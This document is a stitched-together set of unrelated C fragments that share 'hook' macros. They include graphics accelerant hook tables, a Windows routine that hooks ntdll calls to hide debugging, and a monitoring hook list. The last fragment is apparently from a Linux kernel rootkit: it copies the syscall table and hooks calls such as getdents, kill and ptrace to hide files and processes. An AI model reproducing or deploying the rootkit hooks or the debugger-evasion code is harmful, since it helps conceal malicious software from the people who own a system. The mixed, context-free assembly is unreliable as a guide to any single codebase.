void ApplyNtdllHook(HOOK_DLL_EXCHANGE * dllexchange, HANDLE hProcess, BYTE * dllMemory, DWORD_PTR imageBase) { hNtdll = GetModuleHandleW(L"ntdll.dll"); #ifndef _WIN64 countNativeHooks = 0; onceNativeCallContinue = false; HookNative = dllexchange->HookNative; #endif void * HookedNtSetInformationThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetInformationThread") + imageBase); void * HookedNtQuerySystemInformation = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQuerySystemInformation") + imageBase); void * HookedNtQueryInformationProcess = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryInformationProcess") + imageBase); void * HookedNtSetInformationProcess = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetInformationProcess") + imageBase); void * HookedNtQueryObject = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryObject") + imageBase); void * HookedNtYieldExecution = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtYieldExecution") + imageBase); void * HookedNtGetContextThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtGetContextThread") + imageBase); void * HookedNtSetContextThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetContextThread") + imageBase); void * HookedKiUserExceptionDispatcher = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedKiUserExceptionDispatcher") + imageBase); void * HookedNtContinue = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtContinue") + imageBase); void * HookedNtClose = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtClose") + imageBase); void * HookedNtSetDebugFilterState = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtSetDebugFilterState") + imageBase); void * HookedNtCreateThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtCreateThread") + imageBase); void * HookedNtCreateThreadEx = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtCreateThreadEx") + imageBase); void * HookedNtQuerySystemTime = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQuerySystemTime") + imageBase); void * HookedNtQueryPerformanceCounter = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtQueryPerformanceCounter") + imageBase); void * HookedNtResumeThread = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNtResumeThread") + imageBase); HookedNativeCallInternal = (void *)(GetDllFunctionAddressRVA(dllMemory, "HookedNativeCallInternal") + imageBase); _NtSetInformationThread = (t_NtSetInformationThread)GetProcAddress(hNtdll, "NtSetInformationThread"); _NtQuerySystemInformation = (t_NtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); _NtQueryInformationProcess = (t_NtQueryInformationProcess)GetProcAddress(hNtdll, "NtQueryInformationProcess"); _NtSetInformationProcess = (t_NtSetInformationProcess)GetProcAddress(hNtdll, "NtSetInformationProcess"); _NtQueryObject = (t_NtQueryObject)GetProcAddress(hNtdll, "NtQueryObject"); _NtYieldExecution = (t_NtYieldExecution)GetProcAddress(hNtdll, "NtYieldExecution"); _NtGetContextThread = (t_NtGetContextThread)GetProcAddress(hNtdll, "NtGetContextThread"); _NtSetContextThread = (t_NtSetContextThread)GetProcAddress(hNtdll, "NtSetContextThread"); _KiUserExceptionDispatcher = (t_KiUserExceptionDispatcher)GetProcAddress(hNtdll, "KiUserExceptionDispatcher"); _NtContinue = (t_NtContinue)GetProcAddress(hNtdll, "NtContinue"); _NtClose = (t_NtClose)GetProcAddress(hNtdll, "NtClose"); _NtSetDebugFilterState = (t_NtSetDebugFilterState)GetProcAddress(hNtdll, "NtSetDebugFilterState"); _NtCreateThread = (t_NtCreateThread)GetProcAddress(hNtdll, "NtCreateThread"); _NtCreateThreadEx = (t_NtCreateThreadEx)GetProcAddress(hNtdll, "NtCreateThreadEx"); _NtQuerySystemTime = (t_NtQuerySystemTime)GetProcAddress(hNtdll, "NtQuerySystemTime"); _NtQueryPerformanceCounter = (t_NtQueryPerformanceCounter)GetProcAddress(hNtdll, "NtQueryPerformanceCounter"); _NtResumeThread = (t_NtResumeThread)GetProcAddress(hNtdll, "NtResumeThread"); if (dllexchange->EnableNtSetInformationThreadHook == TRUE) HOOK_NATIVE(NtSetInformationThread); if (dllexchange->EnableNtQuerySystemInformationHook == TRUE) HOOK_NATIVE(NtQuerySystemInformation); if (dllexchange->EnableNtQueryInformationProcessHook == TRUE) HOOK_NATIVE(NtQueryInformationProcess); if (dllexchange->EnableNtSetInformationProcessHook == TRUE) HOOK_NATIVE(NtSetInformationProcess); if (dllexchange->EnableNtQueryObjectHook == TRUE) HOOK_NATIVE(NtQueryObject); if (dllexchange->EnableNtYieldExecutionHook == TRUE) HOOK_NATIVE(NtYieldExecution); if (dllexchange->EnableNtGetContextThreadHook == TRUE) HOOK_NATIVE(NtGetContextThread); if (dllexchange->EnableNtSetContextThreadHook == TRUE) HOOK_NATIVE(NtSetContextThread); if (dllexchange->EnableNtCloseHook == TRUE) HOOK_NATIVE(NtClose); if (dllexchange->EnablePreventThreadCreation == TRUE) HOOK_NATIVE(NtCreateThread); if (((dllexchange->EnablePreventThreadCreation == TRUE) || (dllexchange->EnableNtCreateThreadExHook == TRUE)) && _NtCreateThreadEx != 0) HOOK_NATIVE(NtCreateThreadEx); if (dllexchange->EnableNtSetDebugFilterStateHook == TRUE) HOOK_NATIVE_NOTRAMP(NtSetDebugFilterState); #ifndef _WIN64 if (dllexchange->EnableKiUserExceptionDispatcherHook == TRUE) HOOK(KiUserExceptionDispatcher); if (dllexchange->EnableNtContinueHook == TRUE) HOOK_NATIVE(NtContinue); #endif if (dllexchange->EnableNtQuerySystemTimeHook == TRUE && _NtQuerySystemTime != 0) HOOK_NATIVE(NtQuerySystemTime); if (dllexchange->EnableNtQueryPerformanceCounterHook == TRUE) HOOK_NATIVE(NtQueryPerformanceCounter); if (dllexchange->EnableMalwareRunPeUnpacker == TRUE) HOOK_NATIVE(NtResumeThread); dllexchange->isNtdllHooked = TRUE; #ifndef _WIN64 dllexchange->NativeCallContinue = NativeCallContinue; #endif }
void * get_accelerant_hook(uint32 feature, void *data) { switch (feature) { /* One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be requested and subsequently called before any other hook is requested. All other feature hook selections can be predicated on variables assigned during the accelerant initialization process. */ /* initialization */ HOOK(INIT_ACCELERANT); HOOK(CLONE_ACCELERANT); HOOK(ACCELERANT_CLONE_INFO_SIZE); HOOK(GET_ACCELERANT_CLONE_INFO); HOOK(UNINIT_ACCELERANT); HOOK(GET_ACCELERANT_DEVICE_INFO); HOOK(ACCELERANT_RETRACE_SEMAPHORE); /* mode configuration */ HOOK(ACCELERANT_MODE_COUNT); HOOK(GET_MODE_LIST); HOOK(PROPOSE_DISPLAY_MODE); HOOK(SET_DISPLAY_MODE); HOOK(GET_DISPLAY_MODE); HOOK(GET_FRAME_BUFFER_CONFIG); HOOK(GET_PIXEL_CLOCK_LIMITS); HOOK(MOVE_DISPLAY); HOOK(SET_INDEXED_COLORS); HOOK(GET_TIMING_CONSTRAINTS); HOOK(DPMS_CAPABILITIES); HOOK(DPMS_MODE); HOOK(SET_DPMS_MODE); /* cursor managment */ HRDC(SET_CURSOR_SHAPE); HRDC(MOVE_CURSOR); HRDC(SHOW_CURSOR); /* synchronization */ HOOK(ACCELERANT_ENGINE_COUNT); HOOK(ACQUIRE_ENGINE); HOOK(RELEASE_ENGINE); HOOK(WAIT_ENGINE_IDLE); HOOK(GET_SYNC_TOKEN); HOOK(SYNC_TO_TOKEN); /* Depending on the engine architecture, you may choose to provide a different function to be used with each bit-depth for example. Note: These hooks are re-acquired by the app_server after each mode switch. */ /* only export video overlay functions if card is capable of it */ CHKO(OVERLAY_COUNT); CHKO(OVERLAY_SUPPORTED_SPACES); CHKO(OVERLAY_SUPPORTED_FEATURES); CHKO(ALLOCATE_OVERLAY_BUFFER); CHKO(RELEASE_OVERLAY_BUFFER); CHKO(GET_OVERLAY_CONSTRAINTS); CHKO(ALLOCATE_OVERLAY); CHKO(RELEASE_OVERLAY); CHKO(CONFIGURE_OVERLAY); /* When requesting an acceleration hook, the calling application provides a pointer to the display_mode for which the acceleration function will be used. Depending on the engine architecture, you may choose to provide a different function to be used with each bit-depth. In the sample driver we return the same function all the time. Note: These hooks are re-acquired by the app_server after each mode switch. */ /* only export 2D acceleration functions in modes that are capable of it */ /* used by the app_server and applications (BWindowScreen) */ CHKA(SCREEN_TO_SCREEN_BLIT); CHKA(FILL_RECTANGLE); CHKA(INVERT_RECTANGLE); CHKA(FILL_SPAN); /* not (yet) used by the app_server: * so just for application use (BWindowScreen) */ // CHKA(SCREEN_TO_SCREEN_TRANSPARENT_BLIT); // CHKA(SCREEN_TO_SCREEN_SCALED_FILTERED_BLIT; } /* Return a null pointer for any feature we don't understand. */ return 0; }
/* * The standard entry point. Given a uint32 feature identifier, this routine * returns a pointer to the function that implements the feature. Some features * require more information than just the identifier to select the proper * function. The extra information (which is specific to the feature) is * pointed at by the void *data parameter. By default, no extra information * is available. Any extra information available to choose the function will * be noted on a case by case below. */ void *get_accelerant_hook(uint32 feature, void *data) { /* These definition is out of pure lazyness.*/ #define HOOK(x) case B_##x: return (void *)x switch (feature) { /* * One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be * requested and subsequently called before any other hook is * requested. All other feature hook selections can be predicated * on variables assigned during the accelerant initialization process. */ /* initialization */ HOOK(INIT_ACCELERANT); HOOK(CLONE_ACCELERANT); HOOK(ACCELERANT_CLONE_INFO_SIZE); HOOK(GET_ACCELERANT_CLONE_INFO); HOOK(UNINIT_ACCELERANT); HOOK(GET_ACCELERANT_DEVICE_INFO); /// HOOK(ACCELERANT_RETRACE_SEMAPHORE); /* Not implemented. Would be useful to have it implemented. */ /* mode configuration */ HOOK(ACCELERANT_MODE_COUNT); HOOK(GET_MODE_LIST); /// HOOK(PROPOSE_DISPLAY_MODE); HOOK(SET_DISPLAY_MODE); HOOK(GET_DISPLAY_MODE); HOOK(GET_FRAME_BUFFER_CONFIG); HOOK(GET_PIXEL_CLOCK_LIMITS); /* synchronization */ HOOK(ACCELERANT_ENGINE_COUNT); HOOK(ACQUIRE_ENGINE); HOOK(RELEASE_ENGINE); HOOK(WAIT_ENGINE_IDLE); HOOK(GET_SYNC_TOKEN); HOOK(SYNC_TO_TOKEN); /* 2D acceleration */ HOOK(SCREEN_TO_SCREEN_BLIT); HOOK(FILL_RECTANGLE); } /* Return a null pointer for any feature we don't understand. */ return 0; #undef HOOK }
// (whereas the "normal" hooks, those with allow_hook_recursion set to // zero, do) we have to hook the "special" hooks first. Otherwise the // execution flow will end up in an infinite loop, because of hook count // and whatnot. // // In other words, do *NOT* place "special" hooks behind "normal" hooks. // HOOK2(ntdll, LdrLoadDll, TRUE), HOOK2(kernel32, CreateProcessInternalW, TRUE), // // File Hooks // HOOK(ntdll, NtCreateFile), HOOK(ntdll, NtOpenFile), HOOK(ntdll, NtReadFile), HOOK(ntdll, NtWriteFile), HOOK(ntdll, NtDeleteFile), HOOK(ntdll, NtDeviceIoControlFile), HOOK(ntdll, NtQueryDirectoryFile), HOOK(ntdll, NtQueryInformationFile), HOOK(ntdll, NtSetInformationFile), HOOK(ntdll, NtOpenDirectoryObject), HOOK(ntdll, NtCreateDirectoryObject), // CreateDirectoryExA calls CreateDirectoryExW // CreateDirectoryW does not call CreateDirectoryExW HOOK(kernel32, CreateDirectoryW), HOOK(kernel32, CreateDirectoryExW),
/* The standard entry point. Given a uint32 feature identifier, this routine returns a pointer to the function that implements the feature. Some features require more information than just the identifier to select the proper function. The extra information (which is specific to the feature) is pointed at by the void *data parameter. By default, no extra information is available. Any extra information available to choose the function will be noted on a case by case below. */ void * get_accelerant_hook(uint32 feature, void *data) { (void)data; switch (feature) { /* These definitions are out of pure lazyness. */ #define HOOK(x) case B_##x: return (void *)x #define ZERO(x) case B_##x: return (void *)0 /* One of either B_INIT_ACCELERANT or B_CLONE_ACCELERANT will be requested and subsequently called before any other hook is requested. All other feature hook selections can be predicated on variables assigned during the accelerant initialization process. */ /* initialization */ HOOK(INIT_ACCELERANT); HOOK(CLONE_ACCELERANT); HOOK(ACCELERANT_CLONE_INFO_SIZE); HOOK(GET_ACCELERANT_CLONE_INFO); HOOK(UNINIT_ACCELERANT); HOOK(GET_ACCELERANT_DEVICE_INFO); HOOK(ACCELERANT_RETRACE_SEMAPHORE); /* mode configuration */ HOOK(ACCELERANT_MODE_COUNT); HOOK(GET_MODE_LIST); HOOK(PROPOSE_DISPLAY_MODE); HOOK(SET_DISPLAY_MODE); HOOK(GET_DISPLAY_MODE); HOOK(GET_FRAME_BUFFER_CONFIG); HOOK(GET_PIXEL_CLOCK_LIMITS); HOOK(MOVE_DISPLAY); HOOK(SET_INDEXED_COLORS); //HOOK(GET_TIMING_CONSTRAINTS); #ifdef __ANTARES__ case B_GET_PREFERRED_DISPLAY_MODE: return (void*)radeon_get_preferred_display_mode; case B_GET_EDID_INFO: return (void*)radeon_get_edid_info; #endif HOOK(DPMS_CAPABILITIES); HOOK(DPMS_MODE); HOOK(SET_DPMS_MODE); /* cursor managment */ HOOK(SET_CURSOR_SHAPE); HOOK(MOVE_CURSOR); HOOK(SHOW_CURSOR); /* synchronization */ HOOK(ACCELERANT_ENGINE_COUNT); HOOK(ACQUIRE_ENGINE); HOOK(RELEASE_ENGINE); HOOK(WAIT_ENGINE_IDLE); HOOK(GET_SYNC_TOKEN); HOOK(SYNC_TO_TOKEN); /* When requesting an acceleration hook, the calling application provides a pointer to the display_mode for which the acceleration function will be used. Depending on the engine architecture, you may choose to provide a different function to be used with each bit-depth. In the sample driver we return the same function all the time. */ /* 2D acceleration */ HOOK(SCREEN_TO_SCREEN_BLIT); HOOK(FILL_RECTANGLE); HOOK(INVERT_RECTANGLE); HOOK(FILL_SPAN); // overlay HOOK(OVERLAY_COUNT); HOOK(OVERLAY_SUPPORTED_SPACES); HOOK(OVERLAY_SUPPORTED_FEATURES); HOOK(ALLOCATE_OVERLAY_BUFFER); HOOK(RELEASE_OVERLAY_BUFFER); HOOK(GET_OVERLAY_CONSTRAINTS); HOOK(ALLOCATE_OVERLAY); HOOK(RELEASE_OVERLAY); HOOK(CONFIGURE_OVERLAY); #undef HOOK #undef ZERO } return NULL; }
int hook_sys_call_table(void) { anima_memcpy(fake_sct, (void *)ksyms.sys_call_table, sizeof(fake_sct)); HOOK(uname, new_sys_newuname); /* hide files */ HOOK(open, new_sys_open); HOOK(chdir, new_sys_chdir); HOOK(stat, new_sys_stat); HOOK(lstat, new_sys_lstat); //HOOK(newfstatat, new_sys_fstatat); HOOK(getdents, new_sys_getdents); HOOK(getdents64, new_sys_getdents64); HOOK(execve, new_sys_execve); /* hide process */ HOOK(getpgid, new_sys_getpgid); HOOK(getsid, new_sys_getsid); HOOK(setpgid, new_sys_setpgid); HOOK(getpriority, new_sys_getpriority); HOOK(kill, new_sys_kill); HOOK(sched_setscheduler, new_sys_sched_setscheduler); HOOK(sched_setparam, new_sys_sched_setparam); HOOK(sched_getscheduler, new_sys_sched_getscheduler); HOOK(sched_getparam, new_sys_sched_getparam); HOOK(sched_setaffinity, new_sys_sched_setaffinity); HOOK(sched_getaffinity, new_sys_sched_getaffinity); HOOK(sched_rr_get_interval, new_sys_sched_rr_get_interval); HOOK(wait4, new_sys_wait4); HOOK(waitid, new_sys_waitid); HOOK(rt_tgsigqueueinfo, new_sys_rt_tgsigqueueinfo); HOOK(rt_sigqueueinfo, new_sys_rt_sigqueueinfo); HOOK(prlimit64, new_sys_prlimit64); HOOK(ptrace, new_sys_ptrace); #if ARCH_X86 HOOK(migrate_pages, new_sys_migrate_pages); #endif HOOK(move_pages, new_sys_move_pages); HOOK(get_robust_list, new_sys_get_robust_list); HOOK(perf_event_open, new_sys_perf_event_open); HOOK(exit, new_sys_exit); HOOK(exit_group, new_sys_exit_group); HOOK(reboot, new_sys_reboot); /* architecture specific */ #if ARCH_X86 x86_hw_breakpoint_register(0, ksyms.sys_call_table_call, DR_RW_EXECUTE, 0, system_call_hook); #elif ARCH_ARM #endif return 0; }